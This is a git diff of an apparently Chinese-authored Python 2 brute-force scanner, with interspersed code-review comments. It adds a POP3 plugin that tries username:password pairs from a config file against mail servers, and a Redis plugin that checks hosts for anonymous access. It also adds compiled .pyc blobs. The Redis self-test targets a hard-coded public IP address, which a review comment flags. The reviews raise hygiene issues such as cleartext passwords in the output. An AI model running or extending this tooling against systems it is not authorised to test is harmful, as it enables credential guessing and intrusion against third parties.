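Review bot: In `mysq1` the success message that is printed and appended to `self.result` (and later handed to `self.config.write_file`) contains the recovered password in cleartext, so the result file and the terminal scrollback become a credential store for whoever can read them. For an audit record the host, port and account are enough, for example `self.result.append("%s mysql at %s has weak password for account %s\r\n" %(ip,port,username))`. The 1045 branch of `mysql_connect` also prints every attempted `username:password` pair. The same pattern appears in pop3.py (`pop3_Connection`) and in snmp.py (`snmp_l`, where the value is the community string).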

i+zgQYKWS{8;7YS}in+5n+5y?SSnxho(BzY!CP@c|*p_^w>aEpx`>3kV{ z|DuAYNpOu7vOdXC<>5RjaeZ1nEde|9adKQH-VS+B_eoxrfvKGoaT56|@#3!6OI#DU z-u^Clhcj@9dR1-Zqy=tkJ#3l@l2>z>xWRIk{g|uqhzbr;8;7QYLv+pjy4E)B+Pc}Q zy=nS1U5y?Nd2tMfy365kn#Z#g)qu=YS%kg|_};iOQl;N7gw6b|;=qr*ow%;0sVu$)8W~8qnPY z@3B!4n^(vdp??uDqbZG1KAq}YF&QgWK?gm-T^9GKqol#YSL|us;ZLim{!A|!9@`Fb T={Df#)VF_5nV7Utwjlo>eaVe{ literal 0 HcmV?d00001 
diff --git a/Bruteforce/plugins/ndr.pyc b/Bruteforce/plugins/ndr.pyc new file mode 100644 index 0000000000000000000000000000000000000000..5d3e32c0ef39586f46be63b67bc490d58b5bccdc GIT binary patch literal 51798 zcmeHw3v3+8nO@BdNs$!wSUo6dcfIa?NK46Dy;dvjYUN!mMZIh-z1Q6JuBFuthSN=Q zq~XkHxC&q&N(q+;10RrJf@?>QVn zh?u9;HG~=EWmP$&t|6l1S#>RI;yHCKXX1V8TAzvct84wrA5hmeDGwQ5S6-jGuhc!I zK67nQdAK&DW>DOKO&wO=CX+g7Q#UJbNcqE(ci5(mC~vb#9kHofl()sCZnddfmAB2L zZnvr1l=p~9-CLfJ zTX`QbsZZF{QRRKqq&hZrkMf>0sZZI|y~=yqq&{O)_bG3`Nj+dwA64G7CUwlFKBl~b zCiRd_eO!4TGpUDd>PM9KoJl=mQ=d@YQImSirhZg;$4%-9o9Za7fk9Y zoBEXUPMg#hZR*p?dpv8m4}?`7ppD(|dK+ONEiD}S>LoL6k>0p-1FQqS4cXO;Jw zNgcPTW6C>kQYUQcLFHXg{y{1CqD?)dyh|qavQ7P%@~)WFPuSGM%KM~Ay=qgR<20KZ z`xIy2|H>#e?BMt2Tq$s7N@d@{-&&y_I@K8`ob#PG7GIxo-#G8o>eZWmF?0$Qk6Fs4 zqF)Jo&uLUVzs{UejL8*UJ~Aw+6|a7zwkXlKvO?XL3T7IWVpytH0-O~>)^n%i`A(r+ zmdle9uHzNLf)g&*{NRY=TnU{y5K;C6DJ$^nr9!#%UV&u@b^aZ{z8KDxDznUu%y)bz zsQDGp?gVqC&?#37o;+S@-gj^l@&>$9%3Jh9*1PDCzDhN8jvqU=9|cJRAzveCfV4%& zYk>T!6NL3fF>D}jt>Ag6)2Y^RYrUW!x0$->257HV{2*ij{&Zt@mUn<86dW{)bD(hA z$CDs2sA{@!xV9rTt1u2l#q`*iB5GHaar9MFG_mg zmuJEOoZY%xsLuvth$#tzqlg`S3&SHgdbd;#s+FT*wOS62&iIwtxkjNf8x#wbieEok zE=?cR^GE2-=S!7Rn9qL%_Xq4cmDwHrE3#T1B;-7ffSJ(9y3Ipr>U+Xi&+SFeo!d1v z#wVC8@rDwkLb*JHJZ;&p=oGe;JP>E%DxZQaBn|uwA_3`D86lknSkh18WZ}7p`iUD) zsrR#rPk=DXey$I*=W&|Pk+P}V!|HAH_0$-9XL5{fuDgeAR0>L!AS_ghez*gt9PPzw zCG;1WjG2pta^Oq*xbpNYQD>HX95<_M2$B-`VGAiNH0s#xnQfV& z%wSd~6I+H&Cms75A`p?@&!~lywv7(5jnE=DGZcQ_m-+Hpgctxw&na~Mp3}JH_IC9) z+HOj^b}~d!N@FJ_$jljm#7da5zoj66OAZ>L`;f|t=V=PCH=z;9^ z%t+?3taM{E>??(NKcAQBna|Hxy+#?QF7peK?k>hyPE3l#x|wM%icyc_2nG=hWQH~k z^$iV%Yz&T_TD>%13QKo7faRme;x7S~fJTn?RHv!C870PZRK{`K09`#hpYj|IGd0=2 z=8(b1Hpi&>Sz!of!ZAn4@i18pugupps`}oAdc9hgIVl5Zm87wIg#?WndSLEDqRV#I z;~=de@EA&b6-U6)k0Fq=-B0K!lz`1eT#+9iejG=aypm7D!-C%`aC?mg#3eqRZgo3; zc`Ci}8ALE3>d=ZZ>QY7XoQw)iODZJhth#hLN(MX$FaeA*l_w;_1xgP#0~miFp`95# zvT?S`WUv+C^+Put@a{aIJS-JsScbR?7CuIF6zHC~F#gsh_X(W3dznV)F4Q0adYZf2 zBI1c7?5;X}bCm=1N!0WS909RiWd_uy>=44i%+4&s-Zb5IkYbw7^Jn~e-S?#Nq=}^2 
z+>auUoC=(Ku7mTCOp)zvZi<`BeF~RW*;db>h&OR8)m8>`_;-2SaS7F_g3M2nE}Qt`kQ&F~l)uPY2N4i%hK7fRMOqb(Q}EisW)E^&UXzr{BSs_QpQr~^@SvVJ zwQ`~8&sEFN*d$#93)9Zh#++;(XB|@~bq_O|26~fk+`?fRmUX$dVdYu#d9PZG*m^v? zB-Rx#+m9-sK|~;)8_0+-!4{=(-`=DX$lI|=+Z7#8tW4LSYxIli1M8Dmm|$~4`%_^E zSi5b1ze4rujKhkZNbATSe>v_44!0Z*(Uz_v66ru9utVa79GBFVv>41ps~ABI>o+U6|c+_#o3@}oG8 z3r+JTCW&`yPBn;F#lI_suCA$sK57o6@23*4SlogRler$qq96`Du%g1d4S*f|VD9dM#F>|HZ z>dI`epy8&3tACyC&f(WnT$KU&izFolJarGFpjFN$&W&G5&||QZe+4Dh0Y7DK{>?6k zNE0^&8~#=YA_#ZV5^I8&E^R*UaRzDfZvnZ#i&A@zk|#jKmq-ZJ*A|rIbRqngFmuaQ~8gajTUe3dgTl21A2IwB|YxJyZ;f}Fy7 zE-V!N8drnTmruV83IYyQgQG*x?|UMn3YPvB$=N_y`p*;e^bAXXrwbxd$I{>HKm}8w@V&^j2HZzDJsyJ6q9}vG5lhhlLku2mlNQ4E$p*E56?s}kMN0Cu#-e^!b zj^=8GLXHx#FDws*?n&ljW^Lenq zAR=`H{B8##*inLjT%<`Npw_-&@{blJMOSHrGtV7ARgM;6U%)K_ilSs|Yg$@13=tT= z7ZcnYd^`mLzD^=K;G+>1?^H`2EWzmtiyh6Dtk^kZCB-GomZw4f@`54^sgW%c1{W;! zi2YI|z<%7TB|uS@#ndRC3EI9A%Y77P*GNzPuWWwSq~*KbNp^ouLN*Yt{Y8SFp5fZ} zyC5QUT>G#KB2rgwe-IPV8?1T}1pG0Huvpb^WjU@lQn78oQzSoMs0VX}4pu+&Z~>eUvmhP?&vpCI(TqiqGIv4HH<2B&An#1uM_kENcju{|A+HXIM;qVrGF$1~Lsq(Uc$p z$4*2ba6sRRto*`;jI=?ZJ$qF2=G!(qG}%E2|xyb}mo<|z0#yfwJ^sr~Ww;-{=O z-iO~4M(`$C4#m2txYolfAJdo0M?hnkokM0h^tx0%cI+_RY>#2`maFi6rI=yXMoYL$ zU7@QgBQo5JB#?*gUd}e#y-5)xN)(DCxdZ-!dLV$-0W$^h0D6Trxm>D!AggzU1X<9T zE6vWuv=G*XAl-+2NUf87oUvCJNER9Dq*rTV%~#{j?W$jgQS1mu6D34rmFk_`vLhbY zt6D8hOCQ^vpa;2DxHOAxy77#AXePgvTglN1s~K)xx9`u9|Z z!ZKLvn^FFo7`^)5es!x)!KBJt;1MmQG3TMSoPG4bsNa`#UAQjO&~Ot@)Z{iqL@kVq z8?{!vj1s~*Dq0xku2-EG&kaUPmC%g`x2!%=(MtRS{@@Qe83H2y?Q=D567!H1gI#0YG^U`YF?HeO>KrBL5ZijAR=|h zeyIZyIS?l;!8xZ}qHEug%hK&<=VITHwOk85%cs$1jox{T5d0315UVnF@E9Rhtu8#rN^($-laLN5$+1q!5^}a*pMfj)S|jBJRM>`;w)Qb-?EDp)1W!v)j4`5F5%i^%~D7oN_ZHHC>vBCltDv9t@N#-e4w z(=T@Tt>Z$%bUc>$dS>qw^4Y``HNeTgy#h~I;2s*c4ualPMa=mwh)5kgYh4gQWiz#w zpl;3y6tR)sEF?^Th@T`87Vqprg8M42tu@5$M;&btXN{0}t<2aVErjK8hd|g`YRsIX z2~Aku%pi95L}PxB{nI21ZUiLxARfBCgV%dq5Rp2ZeZC7KQiroIb|8XNMHo#A8gp4| z%vaY(WBxfl%}Qj!=QvTt)JfY#y6;#J|L%|wi;e9X^Bi_XS#$T{jw?4(volt>Rd7z7 
zoGyh2duwB)LA@0*iCH~C%wJ}&H6bPvR-`DV%HcUKf1RWduQ!N|@$V$)S!tuBj+lSH z3nEfS%zxB@h%^!NwnogKSRcgv$9$TVAf|w&z-Ic0Nrm<2NysvY>Ce}~#UdvJf5@zt zWw_ApW3fecwMf2AjfLU+4_cPN5;q?`VEtB_gqw)xaIYr3KVN8+v7=Vqk;>sv68M2r zs$lahZhUpLQMrZvoGNfxY0S(tE6f}aB5gJ+%+`y}D$KHe^f0bHzdFmm`AO2G*j@QZO};F&yctpZ_YR z-~lVR>0`x3Jj`#hezIJ7H!IRStyjzpHj3-bYJ}AMV0mf0v#{U%Cqu(K*twD6ep3WiR#iJm_B$OoSkX_-kj1ANV!$7ZZ(kV06k$HJ5B zpQ<;GE#ZcwPd-~!XY6N8m?Tw^R2|&@C;N}2T6bVp!GjnmYR*Rx(H=~6Hx(TcmTYLc z58fCy{S5}i%^KU2{qK0(_s*dIe-lKQX5(LJwk>Qn*(C_xwH}wEIs7N}ik!$3%&I%{ zFk)jkbkLP=H>WrIt>@Zmt^*OaQRuV@k9rO#*?1NM$+U~K#%5f1P+l7w2 z11%)6Dm%P^L!_tgrl_!|v*;}ja`B4>dDsJ2yI9lbA2iFJ!tl7pDO_)Hx~Jvx9(}9) zF<#RsXHT>_CCbK6TidQCro7B{dHndL654X&x3a~H8oMmdhI6ZI6Ec7ywuuNH*=^Zv zo5l#)9XEy|5o@|T)D=|lA!iZ?NAtcX*hrO4LRNBjoq0(|@l?O}-&1B15Le!P_rg2p zFTXZ<>B5OmKEH98$)g-oKSIpJ<=A!-;6Pw7N3THq=>$E*3UdfOn~c0>bsY$l*nyoK#hhw4wmtS-U*3azg`LO;3^Xqxa!<-!GdmxE4e=-MN;I(- zX4MvZngB&4OZbm-3TQ2b6IbV>c%A}_Im*V;EM_#jz5f9$h62o5Esjs3>`_wFk;QP| z=U7|GSE|^3wSu*n`9h_GMVF1U2D%G3Hfz&eu4|@u!x1IMZm4km`5Q~AG4G%l3>PiT zVDw>hVMr$Tf_b8FVDO zD>vLrzVrqtIYXK{@+H2Znoxau#F$QkilrHoXhiwME2F*VP3}*C;tj@>X4%O6dWQnJJxVN(bB7O>uP@ z#+0>;iAFeB;J~5!w35}w4Go||>76>T2Zugw=TO)yN3=26-VS)x>}HRFOJ7&ETX3>nwXUNSBh4M9P*GvgvRBjdu?W2#&PDuj)o zh&1_e(v0H>xaWygr0&CO4i?pnVnnQ~j4ZpoLF7kQWPu!QIULkx@hPE)(SerobkTYY zr>@?EfP;A*UkdwcY+X^F<%@mtlm>5PnsY32Xm?s!V8%3z=QIWVJPBd@ZV=VvmlE`t z2I1f38YOiA{?#ssAX=nmALFvduXP}TlR#Qx1zs*~n^+OlQlpUa_TP>vY+aom#^p6# zR+vHsKgas{RM^5Qc5h(<;fY(dO=F9#BF^QL_(}5b9R72f!CP?E&zG4!?C2_kN%K zvJnvO8}TSzvCNsec=ZQe5Rp2f{F^R_NL_;Z!9a6S3}4@fK$5w^)B0R4{>1F^4@r z@fG$C3+kx|88jwYxG--Mm^$P437oM?HFN@O)!|et0G04=wSKE*+aXGg9Yl_fYw0!- zwkvV=GjB}E%9mc*;@fbt93d8^bp(q4&JNiKK=J)}WcCgyKJ0>s)Pdp$%Mn3Y7Z%X9 zeT(uhV+z(CB|eP@{4>_yh7v=#LX?nqoZIz~HS)O`N38-HlM^m>`N!+kXB>Ve*ST9N zm$AdYQ*gotrHwKi_nqpD18Ys-A9hG-h`ltH0*(U8wN5yg_4itwaE$A4wA5iYF%y4c zCfctwV===f!WiD+E6qeJd0{KKTMCPF`2KoL?A3xevfDD=DCg&PHTn<^^qWn*(WSeP zUMl?zV=~^+LE3nnmPbw>stSfts(HuYA@(>Um8qE|Y0lnEV)%#;ZO#@_;>I~l%2Fk#Dhl=U=d6&cwlaw^;*_Fm^=1klnwYfS!D)9 
zj&rN)E%8JzcwRm#Z4YWR1Bo3+^yVStegzRgIX!4(iAKNe0MAdJ>K)r5I%HHG`?K3T zaI8_{YZE0QcUJ9#qiB>|nKHLylXsMli|^~L-%%)_K^8+ZxET-a;R4Q8CcZr`HJ2Y!EZ%1<%A}!&_&3kwYAxDFg zep%kXtIt-~9a8(FphKAH9y?sw`OMhZGh>cxl)~HtYAJ*e;U^#~n%u zGQP-b6CS1VK3%OUdyD4p6v_?1G;x0XHN6i3Z_*6zAY*bm%@`$ex5$9VB}1`LF3ncv zp$xcOr*WTPKxbh0X$0weroIr5R_IpUM~aRVH}fIWk@7kHF@5rLisjG{R~fa3T9_T$K};k@(SF*YXd6S zky)5j;hFo$m1`LjjmM zC&X4a=5{d$WZ5x!-Lt#`$~j3I*@Q3^Z;2RQA4ZU7cQcK0hfllxnAvG{O-9}{nkvEQ zWMDo#Z*wv5^?+P+mNw5G--YU8)owSKS+7~zdnAj93?;8;EDgx^&_r+)q{`AhNDyJz z8ULQg(QB4=&(ii|mewPd=K2^1J>h46m7RY8wQo>=GHAYwI7B6iMM3ZymdIvqdP2!W@QrnYR=sS| zq~$@?YSr?(wLV5#9uzu!_f0Grd1!eeA3nU6M`{zQo>(8JnbwaWu^&pSQWxLXe2XY` z>&W=N!lBW^_$YckoG!#tIay>$8Zs|soF;CLJDYreqy zQIvT7&<*E&wNdu4k_&nqu5fUL#+Z89X1bfi48&Vp(jJ?LHTtZ6EQR#6ZfO!y^KaQG z93u*oT09>OW_y7ZXY5_UB;t=%byZ+3o>*42nP~Z`s$kW?%y$AzLCt{%PEC z`%ig-O#0EHBxCpJGv*F!_ZVh&ZTDcaP6m%6m^t_-@|TfvU;gym%xcGzX31! z!YnU_)tWP3#cHR{;p`6*W)nJuxiXc|hsq^Jy0Ni@mIQ57ktw&Ir`C3&1x+!o#^w^z zD6gr=rbxaRSyDBc{AZ3eevkm`18Oiw6Uh+GCAlG-(}c2&0YwyYzJlwr5fhGfvT*P& z)7UgF*q3r|F*w42Lp-&01W0e{%X|j1N*GnPMn;wXk=)QQ<97SuLcLyCEFzcuIH|{R z$g-K=EQ>;J_{bZ!vCayklyVd6~I= zM;jUYS|(e+6oF718Gpz*MIvEj6r1Pi_xsfCKa$jbJJ}>@*~!*i$etMRTi8S;F2ysIJ* z!i>baTC1B!IsGJwLe)S(NH${hNE<41TDUxn4_S)zTE2%ex5Q5(ju&S}@-pq0T)t`lX;AQlU?&E^!= z$i(D|9aaEznNT*t_Vn%0KxK?$(aw`upWocZbhhZ#JL2V}TSchlt{P&(J7fv3IA8U2 zq!xDG{!;g)@Dv%F7gsK6(`8oUuf#+!V{9lNJ%e zAt{~<#C^O2HAvFk#Szymd=k%P2NWtPr-WmO%m*ouvq`V7RWv))yZ|yFbw!TM$$((h zN%|6K(c7YM)`*2)e|ktDTn6})xS&_32y||mO(NpSIkvj=nK zIDn{Av;p!)h2(cgG5JF;A^BZPgob3&!^t5$>vhbK?m!Uiop=c$TU>+cH>15O;`71pMs}#$rZKs@Pq<;Q|wy$5tr-Y?b76Xyj{Do5Jimc6HB2s~S2C-GjC*&ir z+NeOvp>|Fdl-q%cyRVP#4g312tMAP0;*s4BC1EtDd1R~tv@oc&c+*|bcA2ydA_CsD zZ3w(6B-q8A=}w`(*l}z7AG4+WMqo?s0=jD*S&G4t|jolb~L* zqF=Q{bYMjX0egf}Ad+~s(dSHy+)R~aOalBX&6$#NIgpH5t?S#n(J8>a@@3*&bX7B~ z4`_1HDVq6IJ|CUJQhZMtb~LE!1HxvY9D|{NGmwg}88(Ad_*V;?Y09R#(SK{sCTwOP zqrV&hX2t@^W`-1f?7-Y$LW|gpX@!^zlGM$X%?zO@6OL}eM?|x57jeaX55Wp~2PHaf z$bFSDQAaG>aDR$vs5;ucg$%=epTSQvSQ}39YaAv|p?n1{KvjiiBN&UoGn#lrZZx}2 
zJmRl_mV2Zs;t|`0M?8+ym`B7+9bU?7%Ps~uRZ_GcZ8Zj<2ilLUQOVkmFp9UC+u8rmR58khPX9UVd+9Ajwnxzv>0MAHbK2$1U4pZhr+^;fI@z|(S05ni;u61Tt|AIr8{_dhVWyP2khZ~n^{X5d#Yo_&WON3@x6rho$^(St6 zju8u{1%ogd!tM!pATS4%|u?%y#jIOk={|20loC$Pp{-YmIKbyCjd=}_h@_wZeuoq3912#E^0x$2&k56q za=66x^8VDy>MgZQ_5 cbRUl0qmS);Vf4k(S4OXoK83qq9zFU001!UHlK=n! literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/pop3.py b/Bruteforce/plugins/pop3.py new file mode 100644 index 0000000..dab169e --- /dev/null +++ b/Bruteforce/plugins/pop3.py 
@@ -0,0 +1,61 @@
+#coding=utf-8
+import time
+from printers import printPink,printGreen
+import threading
+from multiprocessing.dummy import Pool
+import poplib
+
+def pop3_Connection(ip,username,password,port):
+ try:
+ pp = poplib.POP3(ip)
+ #pp.set_debuglevel(1)
+ pp.user(username)
+ pp.pass_(password)
+ (mailCount,size) = pp.stat()
+ pp.quit()
+ if mailCount:
+ lock.acquire()
+ printGreen("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ result.append("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ lock.release()
+ except Exception,e:
+ print e
+ lock.acquire()
+ print "%s pop3 service 's %s:%s login fail " %(ip,username,password)
+ lock.release()
+ pass
+
+def pop3_l(ip,port):
+ try:
+ d=open('conf/pop3.conf','r')
+ data=d.readline().strip('\r\n')
+ while(data):
+ username=data.split(':')[0]
+ password=data.split(':')[1]
+ pop3_Connection(ip,username,password,port)
+ data=d.readline().strip('\r\n')
+ except Exception,e:
+ print e
+ pass
+
+def pop_main(ipdict,threads):
+ printPink("crack pop now...")
+ print "[*] start crack pop %s" % time.ctime()
+ starttime=time.time()
+
+ global lock
+ lock = threading.Lock()
+ global result
+ result=[]
+
+ pool=Pool(threads)
+
+ for ip in ipdict['pop3']:
+ pool.apply_async(func=pop3_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+
+ pool.close()
+ pool.join()
+
+ print "[*] stop pop serice %s" % time.ctime()
+ print "[*] crack pop done,it has Elapsed time:%s " % (time.time()-starttime)
+ return result
\ No newline at end of file
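Review bot: `pop3_l` opens `conf/pop3.conf` and never closes it, and `pop3_Connection` reaches `pp.quit()` only when the login succeeds, so each worker leaks a file handle and a rejected login leaves the socket to be reclaimed whenever the object is collected. Read the list inside `with open('conf/pop3.conf','r') as d:` and move `pp.quit()` into a `finally:` clause that runs only once `pp` exists. The `port` argument is accepted but `poplib.POP3(ip)` is called without it, so the port printed in the result line is not necessarily the one that was contacted; a comment saying so would keep the report honest.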
diff --git a/Bruteforce/plugins/pop3.pyc b/Bruteforce/plugins/pop3.pyc new file mode 100644 index 0000000000000000000000000000000000000000..4c78f08539976cf0b0f5f091300058d343d0c326 GIT binary patch literal 2301 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 aW-Y$axWjwR=-Zh|ZMqBTY$}_{X8r~(ev$70 literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/redisexp.py b/Bruteforce/plugins/redisexp.py new file mode 100644 index 0000000..89a5a45 --- /dev/null +++ b/Bruteforce/plugins/redisexp.py 
@@ -0,0 +1,66 @@
+#coding=utf-8
+import time
+import threading
+from threading import Thread
+from printers import printPink,printGreen
+from Queue import Queue
+import redis
+
+class redis_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ #self.lines=self.config.file2list("conf/redis.conf")
+ self.sp=Queue()
+
+ def redisexp(self):
+ while True:
+ ip,port=self.sp.get()
+ try:
+ r=redis.Redis(host=ip,port=port,db=0,socket_timeout=8)
+ r.dbsize()
+ self.lock.acquire()
+ printGreen('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
+ self.result.append('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
+ self.lock.release()
+ except Exception,e:
+ pass
+ self.sp.task_done()
+
+
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['redis']):
+ printPink("crack redis now...")
+ print "[*] start crack redis %s" % time.ctime()
+ starttime=time.time()
+
+ for i in xrange(threads):
+ t = Thread(target=self.redisexp)
+ t.setDaemon(True)
+ t.start()
+
+ for ip in ipdict['redis']:
+ self.sp.put((str(ip).split(':')[0],int(str(ip).split(':')[1])))
+
+ self.sp.join()
+
+
+ print "[*] stop redis serice %s" % time.ctime()
+ print "[*] crack redis done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+if __name__ == '__main__':
+ import sys
+ sys.path.append("../")
+ from comm.config import *
+ c=config()
+ ipdict={'redis': ['101.201.177.35:6379']}
+ pinglist=['101.201.177.35']
+ test=redis_burp(c)
+ test.run(ipdict,pinglist,50,file="../result/test")
+
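Review bot: The `__main__` self-test hard-codes a publicly routable address in `ipdict` and `pinglist`, so simply running the module sends connection attempts to a host the developer presumably does not control. Point the self-test at loopback as the mysql.py one does, `ipdict={'redis': ['127.0.0.1:6379']}` and `pinglist=['127.0.0.1']`, or read the target from the command line so that it is always an explicit choice. In `redisexp` the `except Exception,e: pass` makes a timeout, a refused connection and an authentication-required reply indistinguishable; a comment stating that any error is treated as "not open" would at least document that.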
diff --git a/Bruteforce/plugins/redisexp.pyc b/Bruteforce/plugins/redisexp.pyc new file mode 100644 index 0000000000000000000000000000000000000000..96f0a60973e1f91a058469c607d9612083ead25e GIT binary patch literal 2744 zcmb_eTW=dx5T3KX#g3h88?~qcmr`U^mEE+WQ7foQX=xu&1lvHsP^~t*C(b(S-OZk3 z;#7`=6#fqXpyGwU!vhk$!#A^W(+b{5lpW8x%$%9;d^5YHKUTVU+aqcO6DDk6^$I~JEVADiQ*EC%G58@s6zcpFI;C zM?tlW#@1f0{jlTkxDJu!QDVQ0l6~8ljh^OOCxt}?b6<`1Sj%dz!^n6$<2-u}F#COk z$6SNZh+W_W1^^OZvr?ka5v5G-^G*r-0zQ5Ae8$%65K~1{A`fvX8afOF4@)#Clrq`M zY_iIDK9>+TJ2lu!YC)RpMgz&pN|sSFuw|@%kp}ys#H=t1xi;h2x*Uw_CtRa}QeYYol}1JB(tJCOw;`vFYvVWUx2(lYt5RB+b8NxJ)Wh^zCVoE!lHWqHVb!&T>>|v z7+j0Co{dI29ovY_%w340adZ}GL*)pH};9wl(+GTFId@sTpKg)Cy z%7$FW+BaIr_GA+1%tmQaP|r8}UYI7j!-u(i-I8#Wxr?mxZRa9&2kN=;YsR+~_%xT; 